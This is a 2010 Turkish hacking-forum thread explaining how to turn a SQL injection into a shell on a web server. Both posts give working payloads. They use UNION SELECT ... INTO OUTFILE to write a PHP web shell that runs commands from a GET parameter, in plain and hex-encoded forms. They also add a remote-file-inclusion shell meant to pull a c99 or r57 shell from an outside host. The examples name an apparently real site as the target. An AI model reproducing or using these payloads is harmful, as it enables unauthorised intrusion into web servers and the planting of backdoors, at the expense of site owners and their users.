THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

SQL İnjection Kullanacak Shell Elde etme

Edros Detretus - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
06/2009
Nereden:
/var/named
Mesajlar:
2.102
Konular:
555
Teşekkür (Etti):
492
Teşekkür (Aldı):
516
Ticaret:
(0) %
05-12-2010 19:34
#1
SQL İnjection Kullanacak Shell Elde etme
Merhaba Arkadaşlar Bir tane sql injection bulduğumuzu farz edelim.Aynı zamanda web katalogunun tam pathini de öğrenmiş olduk.bu halda sistemde basit komut satırı işlevi gören shell elde edebiliriz ki bu shelli kullanarak daha büyük shelleri (c99 ,r57) sisteme çekebiliriz.

web katalogun : "home/www/img/" olduğunu bulduk farz edelim.

sql injectionumuz da "http://site.com/index.php?id=-1" olsun.

şimdi de " <? system($cmd); ?> " şeklinde komut satırı işlevi olan php kodunu sql injectionla servere sokalım.

site.com/index.php?id=-1+union+select+null,’<?system($cmd);?>’,null,null, null,null+from+users+into+outfile+’/home/www/img/shell.php’/*

bu kodla servere soktuğumuz shelli çalıştırmak için aşadaki gibi kullanıyoruz:

https://tik.lat/B3kLW

https://tik.lat/YqrH7
---------------------
SOLO-TÜRK!

Ardımdan yitik mana bir bedenden
ziyade gölgeyim bu diyarlarda.

D & T
Edros Detretus - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
06/2009
Nereden:
/var/named
Mesajlar:
2.102
Konular:
555
Teşekkür (Etti):
492
Teşekkür (Aldı):
516
Ticaret:
(0) %
05-12-2010 19:35
#2
$cmd değişkenini GET'e bağlamadan nasıl çalıştıracaksınız
PHP- Kodu:
<?
$cmd
=$_GET['cmd'];
system($cmd);
?>

Outfile kullanırken, sitenin izinlerinin de olması lazım.
Sorgularda,
Kod:
union+select+0xHEX+into+outfile+'dizin'--
Dizini nasıl bulacağım?
MySQL hataları, başka hatalar... Serverdaki dizinini İntelliTamper gibi programlarla bulamayız. Site içindekileri görebiliriz. Bu da bize, chmod izinli dizin arayışımızda lazım olur.
Konunuz için örnek
Kod:
union+select+0x3c3f0d0a24636d643d245f4745545b27636 d64275d3b0d0a73797374656d2824636d64293b0d0a3f3e+in to+outfile+'/home/tempestade/images/shell.php'--
Daha sonra

www.tempestade.com/images/shell.php?cmd=id

Daha güzel bir örnek...
PHP- Kodu:
<?
$tempestade
=$_GET['rfi'];
@include
"$tempestade";
?>

Kod:
union+select+0x3c3f0d0a2474656d706573746164653d245 f4745545b27726669275d3b0d0a40696e636c7564652022247 4656d70657374616465223b0d0a3f3e+into+outfile+'/home/tempestade/images/shell.php'--
Daha sonra

http://www.tempestade.com/images/she...l.com/r57.txt?
---------------------
SOLO-TÜRK!

Ardımdan yitik mana bir bedenden
ziyade gölgeyim bu diyarlarda.

D & T

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler